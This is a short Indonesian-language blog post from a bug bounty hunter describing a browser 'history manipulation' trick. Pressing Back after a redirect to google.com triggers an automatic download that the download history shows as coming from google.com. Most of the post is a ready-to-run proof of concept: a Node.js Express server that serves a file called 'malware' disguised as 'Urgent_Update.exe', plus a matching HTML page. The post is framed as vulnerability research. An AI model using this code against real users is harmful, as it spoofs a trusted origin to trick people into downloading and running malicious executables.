History Manipulation Enables Fake Downloads on Back Navigation (origin spoofing)

zeeagilzeeagil
2 min read

Hai, saya ingin membagikan tips untuk menemukan kerentanan origin spoofing pada file download melalui teknik History Manipulation Enables Fake Downloads on Back Navigation.

Singkatnya seperti ini:
Seorang pengguna akan diarahkan (redirect) ke situs terpercaya seperti google.com. Lalu, ketika pengguna menekan tombol "Back" (navigasi kembali) untuk kembali ke situs sebelumnya, secara otomatis akan terjadi proses download file.

Yang menarik adalah — jika kita periksa di riwayat download browser, file tersebut akan terlihat seperti berasal dari google.com (atau situs terpercaya lainnya), padahal sebenarnya tidak. Ini bisa dianggap sebagai kerentanan yang valid karena terjadi spoofing pada origin download.

ini source code nya dan anda bisa mencoba nya sendiri :
node.js

const express = require('express');
const fs = require('fs');
const path = require('path');
const app = express();
const PORT = 3000;
let redirect = false;
app.get('/', (req, res) => {
    redirect = true;
    res.setHeader('Cache-Control', 'no-store');
    res.redirect('/index.html');
});
app.get('/index.html', (req, res) => {
    res.setHeader('Cache-Control', 'no-store');
    if (redirect) {
        redirect = false;
        res.sendFile(path.join(__dirname, 'index.html'));
    } else {
        res.redirect('/data');
    }
});
app.get('/data', (req, res) => {
    const filePath = path.join(__dirname, 'malware');
    if (!fs.existsSync(filePath) || fs.statSync(filePath).isDirectory()) {
        return res.status(404).send('File not found');
    }
    res.setHeader('Cache-Control', 'no-store');
    res.setHeader('Content-Type', 'application/octet-stream');
    res.setHeader('Content-Disposition', 'attachment; filename=\"Urgent_Update.exe\"');
    fs.createReadStream(filePath).pipe(res);
});
app.listen(PORT, () => {
    console.log(`Server running on http://localhost:${PORT}`);
});

index.html

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Back</title>
</head>
<body>
  <h1>POC SITE</h1>
  <a href="https://google.com">google.com</a>
</body>
</html>
0
Subscribe to my newsletter

Read articles from zeeagil directly inside your inbox. Subscribe to the newsletter, and don't miss out.

#bountytipsbrowser

Written by

zeeagil
zeeagil

Hi, I’m a bug bounty hunter and cybersecurity enthusiast who began my journey in 2023. I enjoy exploring and discovering hidden vulnerabilities in browsers, applications, and various platforms—especially those that are rarely examined by others. My focus is on browser and website security issues. I also share my findings and educational content through my YouTube channel, Lazy Cyber Security.